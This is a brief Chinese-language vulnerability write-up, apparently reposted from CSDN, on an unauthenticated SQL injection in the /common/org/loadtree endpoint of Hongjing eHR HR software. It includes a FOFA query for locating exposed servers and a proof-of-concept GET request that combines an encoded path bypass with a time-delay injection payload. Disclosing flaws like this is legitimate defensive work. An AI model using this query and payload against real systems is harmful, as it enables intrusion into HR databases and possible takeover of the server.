0x01 产品简介
宏晶eHR人力资源管理软件是一款集成人力资源管理和数字化应用的软件,以满足动态、协作、流程导向的战略需求。
0x02 漏洞概述
Honjing eHR 的/common/org/loadtree 接口中存在SQL 注入漏洞,可能允许未经身份验证的远程攻击者与数据库xp_cmdshell 交互并执行任意命令,从而控制服务器。经分析判断,该漏洞利用难度较大,建议您尽快修复。
0x03 复现环境
FOFA:app=\’HJSOFT-HCM\’
0x04 漏洞复现
示范实验
GET /w_selfservice/oauthservlet/%2e./.%2e/common/org/loadtree?params=childtreetype=1parentid=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27–kind=2issuperuser=1
#宏景eHR /common/org/loadtree 以上有关SQL注入漏洞重现源网络的相关内容仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93036.html
